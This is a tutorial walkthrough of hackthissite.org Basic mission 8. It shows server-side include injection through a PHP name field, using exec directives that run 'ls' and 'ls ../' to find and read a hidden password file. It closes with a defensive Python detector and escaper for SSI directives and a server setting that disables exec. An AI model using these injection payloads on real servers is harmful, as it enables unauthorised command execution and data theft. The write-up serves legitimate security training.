hackthissite.org basic 8 :: SSI
by Arxleol on Friday 03.07.2009, under hackthissite.org, tutorial
This mission introduces some new concepts we haven’t come across until now. Though the solution is fairly simple, without clues you’ll probably need some time to figure it out and come up with the idea of using SSI (server side includes).
The intro of the mission points us to SSI:
The password is yet again hidden in an unknown file. Sam’s daughter has begun learning PHP, and has a small script to demonstrate her knowledge. Requirements: Knowledge of SSI (dynamic html executed by the server, rather than the browser)
Furthermore, when you open the mission you see a somewhat extensive story behind it:
Level 8
Sam remains confident that an obscured password file is still the best idea, but he screwed up with the calendar program. Sam has saved the unencrypted password file in /var/www/hackthissite.org/html/missions/basic/8/
However, Sam’s young daughter Stephanie has just learned to program in PHP. She’s talented for her age, but she knows nothing about security. She recently learned about saving files, and she wrote a script to demonstrate her ability.
So if you do some additional reading, either on Wikipedia or on the sites they suggest, you will probably know what to do. In addition, if you have solved the previous mission you already have the knowledge required to solve this one. So let’s do it.
<!--#exec cmd="ls" -->
With the following command you are able to list all files in the directory where Sam’s daughter’s script saves its file. When we execute it, the received result is:
Hi, tshngmww.shtml hipykpqu.shtml ztxdhjxn.shtml avpfeoie.shtml fviqpmaw.shtml kqbybdzc.shtml dzrnmzgx.shtml npcsygfl.shtml whqxxojt.shtml ylomcmvu.shtml uhdppswp.shtml gzntiicx.shtml dzwbqiuu.shtml qvzuieng.shtml smcerykh.shtml qjhnmhmq.shtml znodwztr.shtml! Your name contains 254 characters.
Avoid going through all these files; just notice the URL where your file opens. So what shall we do now? Simple: we need to obtain the files from the mission’s root directory. Since the ls command accepts a directory as a parameter, we use the following command. It takes us one level up in the directory tree, and therefore we are able to obtain the list of files in the mission’s root directory:
<!--#exec cmd="ls ../" -->
The result is here:
Hi, au12ha39vc.php index.php level8.php tmp! Your name contains 39 characters.
Now it’s obvious that the password is saved in: au12ha39vc.php
After opening this file we obtain the password: cdea748e
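The lesson for whoever maintains a script like Stephanie’s is that visitor input must be escaped before it is written into a server-parsed page, and that input carrying exec or include directives is worth flagging. The following Python is an added example, not code from the mission or from hackthissite.org; it assumes Apache mod_include directive syntax and uses the directives quoted above as constructed sample input.

```python
import html
import re

# Apache mod_include syntax: <!--#element attribute="value" ... -->
# (the '#' must directly follow '<!--'); the regex is deliberately loose so
# that it also catches directives padded with extra whitespace.
SSI_DIRECTIVE = re.compile(r"<!--#\s*([A-Za-z]+)\b(.*?)-->", re.DOTALL)

# 'exec' runs a shell command or CGI script; 'include' pulls in other files.
# These are the elements that must never reach a parsed page from user input.
DANGEROUS_ELEMENTS = {"exec", "include"}


def find_ssi_directives(text: str) -> list[str]:
    """Return the lower-cased element names of every SSI directive in text."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(text)]


def contains_dangerous_ssi(text: str) -> bool:
    """True when text carries an SSI element that executes commands or includes files."""
    return any(name in DANGEROUS_ELEMENTS for name in find_ssi_directives(text))


def sanitize_for_shtml(user_input: str) -> str:
    """Escape user input before it is written into a server-parsed (.shtml) page.

    html.escape turns '<' into '&lt;' and '"' into '&quot;', so a string such as
    '<!--#exec cmd="ls" -->' is stored as literal text that mod_include never
    recognises as a directive, while the browser still displays it unchanged.
    """
    return html.escape(user_input, quote=True)


def render_greeting(name: str) -> str:
    """Safe equivalent of the greeting page the mission writes for each visitor."""
    return f"Hi, {sanitize_for_shtml(name)}! Your name contains {len(name)} characters."


# Constructed sample inputs: a plain name, the two directives used above,
# and a harmless echo directive that should not be rejected.
SAMPLES = [
    "Stephanie",
    '<!--#exec cmd="ls" -->',
    '<!--#exec cmd="ls ../" -->',
    '<!--#echo var="DATE_LOCAL" -->',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        flag = "REJECT" if contains_dangerous_ssi(sample) else "ok"
        print(f"{flag:6} {sample!r} -> {render_greeting(sample)!r}")
```

As a second layer on Apache, the server option Options IncludesNOEXEC disables the exec element entirely, so a missed escape no longer leads to command execution.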